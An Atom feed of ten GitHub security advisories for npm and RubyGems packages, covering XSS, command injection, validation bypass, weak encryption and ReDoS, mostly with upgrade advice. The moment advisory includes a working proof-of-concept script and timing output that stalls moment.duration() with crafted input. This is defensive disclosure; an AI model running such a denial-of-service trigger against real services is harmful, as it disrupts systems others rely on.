<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/github/10</id>
  <title>Most recent entries from github</title>
  <updated>2026-10-02T08:48:39.655775+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-2fqv-h3r5-m4vf</id>
    <title>GHSA-2fqv-h3r5-m4vf — Cross Site Scripting (XSS) in plotly.js</title>
    <updated>2021-08-30T21:12:50+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: plotly.js</p>
<p>Affected versions of `plotly.js` are vulnerable to cross-site scripting if an attacker can convince a user to visit a malicious plot on a site using this package.</p>
<p>## Recommendation</p>
<p>Update to 1.16.0 or later.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-2fqv-h3r5-m4vf"/>
    <published>2017-10-24T18:33:35+00:00</published>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-3m6r-39p3-jq25</id>
    <title>GHSA-3m6r-39p3-jq25 — Doorkeeper is vulnerable to replay attacks</title>
    <updated>2022-04-25T16:34:57+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> RubyGems: doorkeeper</p>
<p>The Doorkeeper gem before 4.2.0 for Ruby might allow remote attackers to conduct replay attacks or revoke arbitrary tokens by leveraging failure to implement the OAuth 2.0 Token Revocation specification.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-3m6r-39p3-jq25"/>
    <published>2017-10-24T18:33:35+00:00</published>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-4jm3-pfpf-h54p</id>
    <title>GHSA-4jm3-pfpf-h54p — espeak-ruby allows arbitrary command execution</title>
    <updated>2023-01-25T22:57:24+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> RubyGems: espeak-ruby</p>
<p>The espeak-ruby gem before 1.0.3 for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in a string to the `speak`, `save`, `bytes` or `bytes_wav` method in `lib/espeak/speech.rb`.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-4jm3-pfpf-h54p"/>
    <published>2017-10-24T18:33:35+00:00</published>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-543v-gj2c-r3ch</id>
    <title>GHSA-543v-gj2c-r3ch — activemodel contains Improper Input Validation</title>
    <updated>2023-06-30T21:32:03+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> RubyGems: activemodel</p>
<p>Active Model in Ruby on Rails 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 supports the use of instance-level writers for class accessors, which allows remote attackers to bypass intended validation steps via crafted parameters.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-543v-gj2c-r3ch"/>
    <published>2017-10-24T18:33:35+00:00</published>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-5vx5-9q73-wgp4</id>
    <title>GHSA-5vx5-9q73-wgp4 — Safemode Gem Has Incomplete List of Disallowed Inputs</title>
    <updated>2023-09-05T21:30:18+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> RubyGems: safemode</p>
<p>rubygem-safemode, as used in Foreman, versions 1.3.1 and earlier are vulnerable to bypassing safe mode limitations via special Ruby syntax. This can lead to deletion of objects for which the user does not have delete permissions or possibly to privilege escalation.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-5vx5-9q73-wgp4"/>
    <published>2017-10-24T18:33:35+00:00</published>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-6h88-qjpv-p32m</id>
    <title>GHSA-6h88-qjpv-p32m — OpenSSL gem for Ruby using inadequate encryption strength</title>
    <updated>2022-04-25T16:33:57+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> RubyGems: openssl</p>
<p>The OpenSSL gem for Ruby uses the same initialization vector (IV) in GCM Mode (aes-*-gcm) when the IV is set before the key, which makes it easier for context-dependent attackers to bypass the encryption protection mechanism.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-6h88-qjpv-p32m"/>
    <published>2017-10-24T18:33:35+00:00</published>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-78rc-8c29-p45g</id>
    <title>GHSA-78rc-8c29-p45g — actionpack allows remote code execution via application's unrestricted use of render method</title>
    <updated>2023-07-03T18:58:43+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> RubyGems: actionpack</p>
<p>Action Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-78rc-8c29-p45g"/>
    <published>2017-10-24T18:33:35+00:00</published>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-87vv-r9j6-g5qv</id>
    <title>GHSA-87vv-r9j6-g5qv — Regular Expression Denial of Service in moment</title>
    <updated>2022-06-07T14:31:25+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: moment</p>
<p>Versions of `moment` prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into `moment.duration()`.</p>
<p>## Proof of concept
```
var moment = require('moment');</p>
<p>var genstr = function (len, chr) {
    var result = "";
    for (i=0; i&lt;=len; i++) {
        result = result + chr;
    }</p>
<p>return result;
}</p>
<p>for (i=20000;i&lt;=10000000;i=i+10000) {
    console.log("COUNT: " + i);
    var str = '-' + genstr(i, '1')
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    moment.duration(str)</p>
<p>var end = process.hrtime(start);
    console.log(end);
}
```</p>
<p>### Results
```
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
```</p>
<p>## Recommendation</p>
<p>Please update to version 2.11.2 or later.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-87vv-r9j6-g5qv"/>
    <published>2017-10-24T18:33:35+00:00</published>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-c92m-rrrc-q5wf</id>
    <title>GHSA-c92m-rrrc-q5wf — safemode gem allows context-dependent attackers to obtain sensitive information via the inspect method</title>
    <updated>2023-09-05T21:11:43+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> RubyGems: safemode</p>
<p>The Safemode gem before 1.2.4 for Ruby, when initialized with a delegate object that is a Rails controller, allows context-dependent attackers to obtain sensitive information via the inspect method.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-c92m-rrrc-q5wf"/>
    <published>2017-10-24T18:33:35+00:00</published>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-f522-ffg8-j8r6</id>
    <title>GHSA-f522-ffg8-j8r6 — Regular Expression Denial of Service in is-my-json-valid</title>
    <updated>2025-10-17T17:50:27+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: is-my-json-valid</p>
<p>Version of `is-my-json-valid` before 2.12.4 are vulnerable to regular expression denial of service (ReDoS) via the email validation function.</p>
<p>## Recommendation</p>
<p>Update to version 2.12.4 or later.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-f522-ffg8-j8r6"/>
    <published>2017-10-24T18:33:35+00:00</published>
  </entry>
</feed>
